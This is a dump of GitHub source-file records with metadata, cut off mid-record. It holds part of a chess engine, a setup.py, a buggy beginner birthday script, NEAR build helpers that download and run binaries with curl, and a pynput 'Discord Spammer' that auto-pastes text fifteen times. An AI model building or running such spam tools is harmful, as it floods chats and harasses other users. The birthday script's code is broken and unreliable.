gmove)\n\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield) and \n is_piece_lfe_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n subtactic = priomove.SUB_TACTICS['bad-deal']\n\n if(defends_check(match)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and\n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['bad-deal']))\n\n if(castles(gmove)):\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cking = cKing(match, gmove.dstx, gmove.dsty)\n is_king_safe = cking.is_safe()\n match.undo_move()\n if(is_king_safe):\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['bad-deal']))\n\n if(is_tactical_draw(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-tactical-draw'], priomove.SUB_TACTICS['neutral']))\n\n if(promotes(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['promotes'], subtactic))\n\n if(captures(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] or\n is_piece_lfe_captured(gmove)):\n if(is_captured_pinned_or_soft_pinned(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], subtactic))\n\n if(does_unpin(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['unpins'], subtactic))\n\n if(defends_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-fork'], subtactic))\n all_fork_defending.append(priomove)\n\n if(is_fork_move(gmove, from_dstfield_attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['forks'], subtactic))\n\n if(threatens_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['threatens-fork'], subtactic))\n\n if(flees(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal']):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n friends, enemies = list_all_field_touches(match, match.color_of_piece(piece), gmove.srcx, gmove.srcy)\n if(len(friends) < len(enemies) or\n is_piece_le_attacker_on_srcfield(gmove, enemies) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['urgent']))\n elif(len(friends) == 0):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['neutral']))\n all_fleeing.append(priomove)\n\n if(len(from_dstfield_attacked) > 0):\n attack_subtactic = subtactic\n if(attack_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n attack_subtactic = priomove.SUB_TACTICS['good-deal']\n\n for attacked in from_dstfield_attacked:\n if(attacked.piece == PIECES['wKg'] or \n attacked.piece == PIECES['bKg']):\n if(check_mates(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], priomove.SUB_TACTICS['urgent']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], attack_subtactic))\n elif(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_attacked_soft_pinned(gmove, attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], attack_subtactic))\n all_attacking.append(priomove)\n\n if(len(from_dstfield_supported) > 0):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_supported_le_attacker(from_dstfield_supported)):\n support_subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n support_subtactic = priomove.SUB_TACTICS['bad-deal']\n\n for supported in from_dstfield_supported:\n if(is_supported_running_pawn(match, supported)):\n support_tactic = priomove.TACTICS['supports-running-pawn']\n elif(len(supported.attacker_beyond) > 0):\n support_tactic = priomove.TACTICS['supports']\n else:\n support_tactic = priomove.TACTICS['supports-unattacked']\n\n if(support_subtactic == priomove.SUB_TACTICS['good-deal'] and \n len(supported.attacker_beyond) > 0 and\n (is_supporter_lower_attacker(gmove, supported) or\n match.is_soft_pin(supported.fieldx, supported.fieldy)[0])):\n support_subtactic = priomove.SUB_TACTICS['urgent']\n\n priomove.tactics.append(cTactic(support_tactic, support_subtactic))\n all_supporting.append(priomove)\n\n if(len(discl_attacked) > 0):\n if(is_discl_attacked_supported(discl_attacked) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_attacking.append(priomove)\n\n if(len(discl_supported) > 0):\n if(is_discl_supported_weak(discl_supported)):\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_supporting.append(priomove)\n\n if(blocks(gmove)):\n block_subtactic = subtactic\n if(block_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n block_subtactic = priomove.SUB_TACTICS['good-deal']\n priomove.tactics.append(cTactic(priomove.TACTICS['blocks'], block_subtactic))\n\n if(running_pawn_in_endgame(gmove)):\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['bad-deal']))\n all_running.append(priomove)\n\n if(controles_file(priomove.gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['controles-file'], subtactic))\n\n if(is_progress(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-progress'], priomove.SUB_TACTICS['neutral']))\n\n if(len(priomove.tactics) > 0):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n priomove.evaluate_priorities(piece)\n\n all_attacking.sort(key=attrgetter('prio'))\n for pmove in all_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(priomove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_attacking.sort(key=attrgetter('prio'))\n for pmove in all_discl_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_supporting.sort(key=attrgetter('prio'))\n for pmove in all_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_supporting.sort(key=attrgetter('prio'))\n for pmove in all_discl_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fork_defending.sort(key=attrgetter('prio'))\n for pmove in all_fork_defending:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['defends-fork'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fleeing.sort(key=attrgetter('prio'))\n for pmove in all_fleeing:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['flees'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n \"\"\"excludes.clear()\n all_running.sort(key=attrgetter('prio'))\n for pmove in all_running:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['is-running-pawn'])\n pmove.evaluate_priorities()\"\"\"\n\n if(dbggmove):\n for priomove in priomoves:\n if(priomove.gmove.srcx == dbggmove.srcx and \n priomove.gmove.srcy == dbggmove.srcy and \n priomove.gmove.dstx == dbggmove.dstx and \n priomove.gmove.dsty == dbggmove.dsty):\n priomove.prio = dbgprio\n break\n priomoves.sort(key=attrgetter('prio'))\n", "repo_name": "richardtraindl/immanuel", "sub_path": "kate/engine/analyze_move.py", "file_name": "analyze_move.py", "file_ext": "py", "file_size_in_byte": 27269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "match.readfield", "line_number": 21, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 34, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 35, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 36, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 47, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 48, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 49, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 54, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 61, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 62, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 63, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 66, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 74, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 75, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 77, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 83, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 85, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 111, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 113, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 114, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 120, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 123, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 125, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 132, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 133, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 134, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 135, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 141, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 142, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 145, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 147, "usage_type": "call"}, {"api_name": "match.next_color", "line_number": 162, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 163, "usage_type": "call"}, {"api_name": "match.board", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pieces.king.cKing", "line_number": 165, "usage_type": "call"}, {"api_name": "match.board", "line_number": 165, "usage_type": "attribute"}, {"api_name": "match.do_move", "line_number": 171, "usage_type": "call"}, {"api_name": "match.is_move_available", "line_number": 172, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 173, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 178, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 179, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen.STEPS", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pieces.queen.cQueen", "line_number": 181, "usage_type": "name"}, {"api_name": "pieces.piece.cTouch", "line_number": 183, "usage_type": "call"}, {"api_name": "pieces.piece.cTouch", "line_number": 184, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 186, "usage_type": "name"}, {"api_name": "pieces.rook.cRook.dir_for_move", "line_number": 187, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 187, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop", "line_number": 190, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop.dir_for_move", "line_number": 191, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 191, "usage_type": "name"}, {"api_name": "match.REVERSE_DIRS", "line_number": 198, "usage_type": "attribute"}, {"api_name": "match.search", "line_number": 200, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 202, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 216, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 217, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 227, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 228, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 242, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 243, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 245, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 247, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 249, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 257, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 266, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 267, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 276, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 281, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 282, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 283, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 285, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 291, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 296, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 301, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 302, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 303, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 305, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 311, "usage_type": "call"}, {"api_name": "pieces.pawn.cPawn", "line_number": 323, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 329, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 330, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 335, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 336, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 338, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 345, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 348, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 351, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen", "line_number": 354, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 360, "usage_type": "call"}, {"api_name": "helper.reverse_lookup", "line_number": 375, "usage_type": "call"}, {"api_name": "match.is_opening", "line_number": 390, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 391, "usage_type": "call"}, {"api_name": "match.board", "line_number": 393, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 394, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 397, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 398, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 401, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 402, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 405, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 406, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 409, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 410, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 413, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 414, "usage_type": "attribute"}, {"api_name": "match.is_soft_pin", "line_number": 439, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 446, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 452, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 453, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 455, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 492, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 493, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 540, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 582, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 585, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 591, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 595, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 601, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 605, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 611, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 615, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 621, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 625, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 631, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 635, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 641, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 661, "usage_type": "call"}]}
+{"seq_id": "6523972302", "text": "from setuptools import setup\nimport unittest\n\ndef para_test_suite():\n test_loader = unittest.TestLoader()\n test_suite = test_loader.discover('tests', pattern='test_*.py')\n return test_suite\n\nsetup(name='para',\n version='2.0.1',\n author='Migdalo',\n license='MIT',\n packages=['para'],\n test_suite='setup.para_test_suite',\n entry_points={\n 'console_scripts': [\n 'para = para.para:process_arguments'\n ]\n },\n zip_safe=True)\n\n", "repo_name": "Migdalo/para", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestLoader", "line_number": 5, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "41898045274", "text": "from pynput.keyboard import Key, Controller\r\nimport time\r\nimport clipboard\r\n\r\nfrom tkinter import *\r\n# Packages\r\ngui = Tk()\r\n\r\n\r\ngui.geometry(\"800x300\")\r\ngui.resizable(width=False, height=False)\r\ngui.title('Discord Spammer')\r\n# GUI\r\n\r\ndef getTextInput():\r\n result = text_box.get(\"1.0\",\"end\")\r\n clipboard.copy(result)\r\n# Text Input Value Command\r\n\r\ndef startSpamming():\r\n time.sleep(4)\r\n for _ in range(15):\r\n keyboard = Controller()\r\n with keyboard.pressed(Key.ctrl):\r\n keyboard.press('v')\r\n keyboard.release('v')\r\n keyboard.press(Key.enter)\r\n keyboard.release(Key.enter)\r\n time.sleep(0.5)\r\n\r\n# Main Spamming Command\r\n\r\n\r\nbtn = Button(gui, text = 'Copy Text', bg = 'gray', width = 20, height = 3, command = getTextInput)\r\nbtn.pack()\r\nbtn.place(x=340, y=130)\r\n# Copies a text\r\n\r\nbtn = Button(gui, text = 'Start Spam', bg = 'green', width = 40, height = 5, command = startSpamming)\r\nbtn.pack()\r\nbtn.place(x=270, y=200)\r\n# Start Spam Button\r\n\r\ntext_box = Text(\r\n gui,\r\n height=2,\r\n width=100,\r\n font=(\"Arial\", 32\r\n))\r\n\r\ntext_box.pack()\r\n# Text Box\r\n\r\ngui.mainloop()\r\n\r\n# Project by Fr0das\r\n# Project by Fr0das\r\n# Project by Fr0das", "repo_name": "Fr0das/discord-spammer", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "clipboard.copy", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "pynput.keyboard.Controller", "line_number": 23, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key.ctrl", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 24, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 27, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "20548852206", "text": "print ('hi stupid')\nf_name = input('Whats your first name: ')\nl_name = input('How about a last name: ')\nborn_month = input(' What day of the month were you born?: ')\nborn_day = input('And the month?: ')\nborn_year = input('year?: ')\nprint('Hey ',f_name,l_name,' so your birthday is ',born_month, ' / ',born_day, '/',born_year)\nfrom datetime import date\ntoday = date.year \nprint (date.year )\ncalculate_age = today.year - born_year - ((today.month,today.day) < (born_month,born._day))\ntoday = date.today\n \n \n", "repo_name": "Kukukachuj/cti110", "sub_path": "Messingaround.py", "file_name": "Messingaround.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date.year", "line_number": 9, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.year", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "7671268003", "text": "import os\nimport pathlib\nimport subprocess\nimport sys\nimport tempfile\nimport typing\n\nimport semver\nfrom configured_logger import logger\nfrom github import Github\n\n\ndef current_branch():\n return os.environ.get('BUILDKITE_BRANCH') or subprocess.check_output([\n \"git\", \"rev-parse\", \"--symbolic-full-name\", \"--abbrev-ref\", \"HEAD\"\n ]).strip().decode()\n\n\ndef get_releases():\n git = Github(None)\n repo = git.get_repo(\"nearprotocol/nearcore\")\n releases = []\n\n for release in repo.get_releases():\n try:\n # make sure that the version provided is a valid semver version\n version = semver.VersionInfo.parse(release.title)\n releases.append(release)\n except Exception as e:\n pass\n\n return sorted(releases,\n key=lambda release: semver.VersionInfo.parse(release.title),\n reverse=True)\n\n\ndef latest_rc_branch():\n releases = list(\n filter(\n lambda release: (semver.VersionInfo.parse(release.title).prerelease\n or \"\").startswith(\"rc\"), get_releases()))\n\n if not releases:\n return None\n\n return semver.VersionInfo.parse(releases[0].title).finalize_version()\n\n\nclass Executables(typing.NamedTuple):\n root: pathlib.Path\n neard: pathlib.Path\n state_viewer: pathlib.Path\n\n def node_config(self) -> typing.Dict[str, typing.Any]:\n return {\n 'local': True,\n 'neard_root': self.root,\n 'binary_name': self.neard.name\n }\n\n\ndef _compile_binary(branch: str) -> Executables:\n \"\"\"For given branch, compile binary.\n\n Stashes current changes, switches branch and then returns everything back.\n \"\"\"\n # TODO: download pre-compiled binary from github for beta/stable?\n prev_branch = current_branch()\n stash_output = subprocess.check_output(['git', 'stash'])\n subprocess.check_output(['git', 'checkout', str(branch)])\n subprocess.check_output(['git', 'pull', 'origin', str(branch)])\n result = _compile_current(branch)\n subprocess.check_output(['git', 'checkout', prev_branch])\n if stash_output != b\"No local changes to save\\n\":\n subprocess.check_output(['git', 'stash', 'pop'])\n return result\n\n\ndef escaped(branch):\n return branch.replace('/', '-')\n\n\ndef _compile_current(branch: str) -> Executables:\n \"\"\"Compile current branch.\"\"\"\n subprocess.check_call(['cargo', 'build', '-p', 'neard', '--bin', 'neard'])\n subprocess.check_call(['cargo', 'build', '-p', 'near-test-contracts'])\n subprocess.check_call(['cargo', 'build', '-p', 'state-viewer'])\n branch = escaped(branch)\n build_dir = pathlib.Path('../target/debug')\n neard = build_dir / f'neard-{branch}'\n state_viewer = build_dir / f'state-viewer-{branch}'\n (build_dir / 'neard').rename(neard)\n (build_dir / 'state-viewer').rename(state_viewer)\n return Executables(build_dir, neard, state_viewer)\n\n\ndef download_file_if_missing(filename: pathlib.Path, url: str) -> None:\n \"\"\"Downloads a file from given URL if it does not exist already.\n\n Does nothing if file `filename` already exists. Otherwise, downloads data\n from `url` and saves them in `filename`. Downloading is done with `curl`\n tool and on failure (i.e. if it returns non-zero exit code) `filename` is\n not created. On success, the file’s mode is set to 0x555 (i.e. readable and\n executable by anyone).\n\n Args:\n filename: Path to the file.\n url: URL of the file to download (if the file is missing).\n \"\"\"\n if filename.exists():\n if not filename.is_file():\n sys.exit(f'{filename} exists but is not a file')\n return\n\n proto = '\"=https\"' if os.uname()[0] == 'Darwin' else '=https'\n cmd = ('curl', '--proto', proto, '--tlsv1.2', '-sSfL', url)\n name = None\n try:\n with tempfile.NamedTemporaryFile(dir=filename.parent,\n delete=False) as tmp:\n name = pathlib.Path(tmp.name)\n subprocess.check_call(cmd, stdout=tmp)\n name.chmod(0o555)\n name.rename(filename)\n name = None\n finally:\n if name:\n name.unlink()\n\n\ndef download_binary(uname, branch):\n \"\"\"Download binary for given platform and branch.\"\"\"\n logger.info(f'Getting near & state-viewer for {branch}@{uname}')\n outdir = pathlib.Path('../target/debug')\n basehref = ('https://s3-us-west-1.amazonaws.com/build.nearprotocol.com'\n f'/nearcore/{uname}/{branch}/')\n neard = outdir / f'neard-{branch}'\n state_viewer = outdir / f'state-viewer-{branch}'\n download_file_if_missing(neard, basehref + 'neard')\n download_file_if_missing(state_viewer, basehref + 'state-viewer')\n return Executables(outdir, neard, state_viewer)\n\n\nclass ABExecutables(typing.NamedTuple):\n stable: Executables\n current: Executables\n\n\ndef prepare_ab_test(stable_branch):\n # Use NEAR_AB_BINARY_EXISTS to avoid rebuild / re-download when testing locally.\n #if not os.environ.get('NEAR_AB_BINARY_EXISTS'):\n # _compile_current(current_branch())\n # uname = os.uname()[0]\n # if stable_branch in ['master', 'beta', 'stable'] and uname in ['Linux', 'Darwin']:\n # download_binary(uname, stable_branch)\n # else:\n is_nayduck = bool(os.getenv('NAYDUCK'))\n\n if is_nayduck:\n # On NayDuck the file is fetched from a builder host so there’s no need\n # to build it.\n root = pathlib.Path('../target/debug/')\n current = Executables(root, root / 'neard', root / 'state-viewer')\n else:\n current = _compile_current(current_branch())\n\n try:\n stable = download_binary(os.uname()[0], stable_branch)\n except Exception:\n if is_nayduck:\n sys.exit('RC binary should be downloaded for NayDuck.')\n stable = _compile_binary(str(stable_branch))\n return ABExecutables(stable=stable, current=current)\n", "repo_name": "MinnMinn/near-core", "sub_path": "pytest/lib/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 5936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "github.Github", "line_number": 20, "usage_type": "call"}, {"api_name": "semver.VersionInfo.parse", "line_number": 27, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 27, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 33, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 33, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 40, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 40, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 46, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 46, "usage_type": "attribute"}, {"api_name": "typing.NamedTuple", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 70, "usage_type": "call"}, {"api_name": 